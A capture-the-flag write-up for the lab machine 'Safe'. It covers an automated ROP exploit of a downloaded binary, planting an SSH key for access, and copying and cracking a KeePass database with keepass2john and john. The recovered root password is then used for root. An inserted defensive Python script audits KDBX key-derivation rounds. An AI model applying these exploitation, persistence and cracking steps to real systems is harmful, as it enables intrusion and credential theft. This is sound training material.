
Safe was an easy 20-point box created by ecdo. It started out with pwning a binary to get a shell as user, and then abusing KeePass to get root.
User.txt
Nmap
We start the box with a quick TCP nmap scan:

```
# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.147 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) &&
nmap -sV -sC -T4 -p$ports 10.10.10.147
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)
|   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)
|_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
1337/tcp open  waste?
```
HTTP
Checking out http://10.10.10.147/ we get the Apache 2 Debian default page. Checking the source code we see the following:

```html
<!-- 'myapp' can be downloaded to analyze from here
its running on port 1337 -->
```

Going to http://10.10.10.147/myapp will download the binary for us.
Binary Exploitation
We can use a tool called ropstar to automatically pwn this binary for us:

```
# python ropstar.py /root/HTB/boxes/safe/myapp -rhost 10.10.10.147 -rport 1337
...
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
```
Flag
We can simply cat the user flag from our pwn shell:

```
$ cat /home/user/user.txt
7a29ee...
```
Root.txt
SSH Shell
To get a better shell we add the public key of our attacking host to /home/user/.ssh/authorized_keys and SSH in:

```
$ echo 'ssh-rsa AAAA...kzh root@kali' > /home/user/.ssh/authorized_keys
# ssh -i id_rsa user@10.10.10.147
user@safe:~$
```
KeePass
Checking out the user's home directory we notice a KeePass password database file and a bunch of images:

```
user@safe:~$ ls -la
-rw-r--r-- 1 user user 1907614 May 13 11:15 IMG_0545.JPG
-rw-r--r-- 1 user user 1916770 May 13 11:15 IMG_0546.JPG
-rw-r--r-- 1 user user 2529361 May 13 11:15 IMG_0547.JPG
-rw-r--r-- 1 user user 2926644 May 13 11:15 IMG_0548.JPG
-rw-r--r-- 1 user user 1125421 May 13 11:15 IMG_0552.JPG
-rw-r--r-- 1 user user 1085878 May 13 11:15 IMG_0553.JPG
-rw-r--r-- 1 user user    2446 May 13 11:15 MyPasswords.kdbx
```
KeePass is an open source password manager that stores passwords in encrypted databases which can only be unlocked with the master password and/or a key file.
Since there are six seemingly random images present, we can assume that one of them is the key file. Let's scp the kdbx file and the images over to our attacking host's working directory:

```
# scp user@10.10.10.147:/home/user/MyPasswords.kdbx .
# scp user@10.10.10.147:/home/user/IMG_0545.JPG .
# scp user@10.10.10.147:/home/user/IMG_0546.JPG .
# scp user@10.10.10.147:/home/user/IMG_0547.JPG .
# scp user@10.10.10.147:/home/user/IMG_0548.JPG .
# scp user@10.10.10.147:/home/user/IMG_0552.JPG .
# scp user@10.10.10.147:/home/user/IMG_0553.JPG .
```
Cracking KeePass
To crack the KeePass database file we'll use a utility called keepass2john from JohnTheRipper, which extracts a crackable hash from the KeePass database file together with the key file we specify:

```
# keepass2john
Usage: keepass2john [-k <keyfile>] <.kdbx database(s)>
```
By process of elimination we find out that IMG_0547.JPG is the key file and the password is bullshit:

```
# keepass2john -k IMG_0547.JPG MyPasswords.kdbx > 547_hash
# john --wordlist=/root/rockyou.txt 547_hash
...
bullshit (mypass)
```
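What keepass2john reads is the database's unencrypted outer header, and the transform-round count stored there decides how expensive each guess of a wordlist attack like the one above is. As an added defensive check, not part of the original writeup, this Python parses a constructed KDBX 3.1 header (the sample bytes are made up here) and flags a low key-derivation work factor:

```python
import struct

# KDBX magic values and the header field IDs used by the KDBX 3.x outer header.
SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67
FIELD_NAMES = {1: "comment", 2: "cipher_id", 3: "compression", 4: "master_seed",
               5: "transform_seed", 6: "transform_rounds", 7: "encryption_iv",
               8: "protected_stream_key", 9: "stream_start_bytes", 10: "inner_stream_id"}

def _field(fid, data):
    # KDBX 3.x: 1-byte field id, 2-byte little-endian length, then the data.
    return struct.pack("<BH", fid, len(data)) + data

# Constructed sample header (no encrypted payload follows); values are arbitrary.
SAMPLE_HEADER = (struct.pack("<III", SIG1, SIG2, 0x00030001)          # version 3.1
                 + _field(2, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))  # AES-256 UUID
                 + _field(3, struct.pack("<I", 1))                     # gzip compression
                 + _field(4, b"\x11" * 32) + _field(5, b"\x22" * 32)   # seeds
                 + _field(6, struct.pack("<Q", 6000))                   # low round count
                 + _field(7, b"\x33" * 16)                              # IV
                 + _field(0, b"\r\n\r\n"))                              # end marker

def parse_kdbx_header(blob):
    """Parse the unencrypted KDBX 3.x outer header into a dict of raw field bytes."""
    sig1, sig2, version = struct.unpack_from("<III", blob, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    major = version >> 16
    if major >= 4:
        # KDBX 4 uses 4-byte lengths and a KDF parameter dictionary; out of scope here.
        raise ValueError("KDBX 4 header layout not handled")
    fields, off = {"version": f"{major}.{version & 0xFFFF}"}, 12
    while True:
        fid, length = struct.unpack_from("<BH", blob, off)
        off += 3
        data = blob[off:off + length]
        off += length
        if fid == 0:
            return fields
        fields[FIELD_NAMES.get(fid, f"field_{fid}")] = data

def audit_kdf(blob, min_rounds=1_000_000):
    """Report the AES-KDF transform rounds and whether they fall below a chosen floor."""
    fields = parse_kdbx_header(blob)
    rounds = struct.unpack("<Q", fields["transform_rounds"])[0]
    return {"version": fields["version"], "rounds": rounds, "weak_kdf": rounds < min_rounds}

if __name__ == "__main__":
    print(audit_kdf(SAMPLE_HEADER))
```

Point the parser at the first few hundred bytes of a real .kdbx to see what the cracker is working against; the fix for a weak result is to raise the rounds (or migrate to KDBX 4 with Argon2) in KeePass' database settings.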
kpcli
Using kpcli, a command line interface for KeePass, we can open the MyPasswords.kdbx file and get the root password:

```
# kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx
Please provide the master password: bullshit
kpcli:/MyPasswords> help
...
show -- Show an entry: show [-f] [-a] <entry path|entry number>
...
kpcli:/MyPasswords> show 0
Title: Root password
Uname: root
 Pass: u3v2249dl9ptv465cogl3cnpo3fyhk
  URL:
Notes:
```
Flag
Within our SSH shell as user we just have to run the following and we get root:

```
user@safe:~$ su root
Password: u3v2249dl9ptv465cogl3cnpo3fyhk
root@safe:/home/user# cat /root/root.txt
d7af23...
```